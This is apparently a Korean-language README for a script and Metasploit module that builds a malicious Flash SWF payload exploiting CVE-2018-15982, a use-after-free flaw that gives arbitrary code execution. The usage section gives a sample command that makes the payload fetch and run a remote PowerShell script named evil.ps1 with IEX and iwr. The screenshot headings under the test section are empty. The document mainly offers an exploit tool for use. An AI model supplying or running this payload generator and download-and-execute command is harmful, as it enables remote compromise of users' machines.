
Script and metasploit module for CVE-2018-15982
이 스크립트는 CVE-2018-15982를 위한 swf 페이로드를 생성하며, https://github.com/smgorelik/Windows-RCE-exploits의 PoC를 기반으로 합니다. 이 취약점은 Gigamon ATR의 Chenming Xu와 Ed Miles에 의해 발견되었습니다.
이 취약점은 플래시에서 임의 코드 실행을 가능하게 하는 use-after-free 결함입니다. 자세한 내용은 아래 링크에서 확인할 수 있습니다.
참고: 현재 하나의 블록만 스프레이합니다. 스크립트를 만든 후에 이를 알게 되었습니다.
사용법:
python create_swf.py <command> <output file name>
사용 예시:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
테스트 환경:
페이로드 생성:

페이로드 실행:

실행 확인:

